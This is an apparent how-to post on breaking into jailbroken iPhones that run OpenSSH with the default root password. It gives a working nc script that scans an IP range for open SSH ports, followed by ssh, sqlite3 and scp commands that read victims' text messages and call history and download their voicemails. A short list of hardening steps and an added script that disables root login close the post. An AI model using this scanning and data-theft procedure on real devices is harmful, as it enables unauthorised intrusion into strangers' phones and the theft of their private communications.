How to access iPhones remotely using OpenSSH

A jailbroken Apple iPhone with OpenSSH installed is reachable over the internet using ssh, and the root account still has the default password "alpine".

You can use a short script to find IP addresses that have port 22 open and then try to log in. You can run this script from your Mac or any Linux machine.

#!/bin/sh
# Walks through 94.157.0.1 - 94.157.191.254 and records, per address, whether
# TCP port 22 answered: open/<ip> or closed/<ip>. A bare <ip> file marks an
# address that is being probed right now, so a second copy of the script
# skips it.

fourth=1
third=0

mkdir -p /tmp/scan-iphones/open
mkdir -p /tmp/scan-iphones/closed

while [ "$third" -lt 192 ] ; do
while [ "$fourth" -lt 255 ] ; do
  if [ ! -f /tmp/scan-iphones/94.157."$third"."$fourth" ] ; then
   if [ ! -f /tmp/scan-iphones/open/94.157."$third"."$fourth" ] ; then
    if [ ! -f /tmp/scan-iphones/closed/94.157."$third"."$fourth" ] ; then
     # Touching /tmp/scan-iphones/stop ends the run cleanly.
     if [ -f /tmp/scan-iphones/stop ] ; then
      echo "Stopping because /tmp/scan-iphones/stop exists."
      exit 1
     fi
     touch /tmp/scan-iphones/94.157."$third"."$fourth"
     # One-second connect attempt; the result decides which directory gets the marker file.
     nc -w 1 -z 94.157."$third"."$fourth" 22-22 > /dev/null 2>&1 && touch /tmp/scan-iphones/open/94.157."$third"."$fourth" || touch /tmp/scan-iphones/closed/94.157."$third"."$fourth"
     rm /tmp/scan-iphones/94.157."$third"."$fourth"
    fi
   fi
  fi
fourth=$(($fourth+1))
done
fourth=1
third=$(($third+1))
done

The IP addresses that have port 22 open are stored in /tmp/scan-iphones/open/*. Some of these addresses are not iPhones, so not every address listed there is vulnerable. To stop the script, press [CTRL]+[c] or type touch /tmp/scan-iphones/stop.

Now that you have IP addresses where you can login, use one of these "features":

Read all text messages

From your Mac or any Linux machine, type:

$ ssh [email protected]
# sqlite3 /private/var/mobile/Library/SMS/sms.db
SELECT * FROM message;

See the call history

From your Mac or any Linux machine, type:

$ ssh [email protected]
# sqlite3 /private/var/mobile/Library/CallHistory/call_history.db
SELECT * FROM call;

Listen to voicemails

From your Mac or any Linux machine, type:

$ scp [email protected]:/private/var/mobile/Library/Voicemail/*.amr .

Open the Finder and drag the .amr files onto QuickTime to listen to them.

To secure your iPhone, you can use one or more of these measures:

  • Change the "root" password - On the Terminal, type # passwd.
  • Change the "mobile" password - On the Terminal, type # passwd mobile.
  • Disable OpenSSH start at boot time - Don't know how to do this yet.
  • Stop OpenSSH for now - launchctl unload -w /Library/LaunchDaemons/com.openssh.sshd.plist (load -w would start it again).
  • Set "PermitRootLogin" to "no" - in /private/etc/ssh/sshd_config; restart OpenSSH for the change to take effect.
  • If all fails: Uninstall OpenSSH - Using the tools that installed OpenSSH.
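As an added example (not from the original post), a small POSIX sh script that applies the PermitRootLogin change from the list above to an sshd_config file and checks what sshd would actually use. The config path is the one named on the page; the function names and the sample config are constructed here.

```shell
#!/bin/sh
# Added example (not from the original post): set "PermitRootLogin no" in an
# sshd_config file and verify the effective value before restarting sshd.
# The path is the one named on the page; function names and the sample
# config below are constructed for this example.
SSHD_CONFIG=${SSHD_CONFIG:-/private/etc/ssh/sshd_config}

# Print the PermitRootLogin value sshd would use from the given config:
# the first active (uncommented) directive wins, or "unset" if there is none.
# Only the "Keyword value" form is handled, not "Keyword=value".
effective_permit_root_login() {
    awk 'BEGIN { v = "unset" }
         tolower($1) == "permitrootlogin" { v = tolower($2); exit }
         END { print v }' "$1"
}

# Rewrite the config so a single active "PermitRootLogin no" comes first
# (ahead of any Match block) and every other active PermitRootLogin line is
# removed. Commented lines are left alone. Safe to run more than once.
set_permit_root_login_no() {
    cfg=$1
    tmp="$cfg.tmp.$$"
    {
        echo "PermitRootLogin no"
        awk 'tolower($1) != "permitrootlogin"' "$cfg"
    } > "$tmp" && mv "$tmp" "$cfg"
}

# Demo on a constructed copy so no real config is touched. On the phone you
# would run: set_permit_root_login_no "$SSHD_CONFIG" and then restart sshd.
demo_cfg=$(mktemp) || exit 1
printf '#PermitRootLogin yes\nPort 22\nPermitRootLogin yes\n' > "$demo_cfg"
echo "before: $(effective_permit_root_login "$demo_cfg")"   # before: yes
set_permit_root_login_no "$demo_cfg"
echo "after:  $(effective_permit_root_login "$demo_cfg")"   # after:  no
rm -f "$demo_cfg"
```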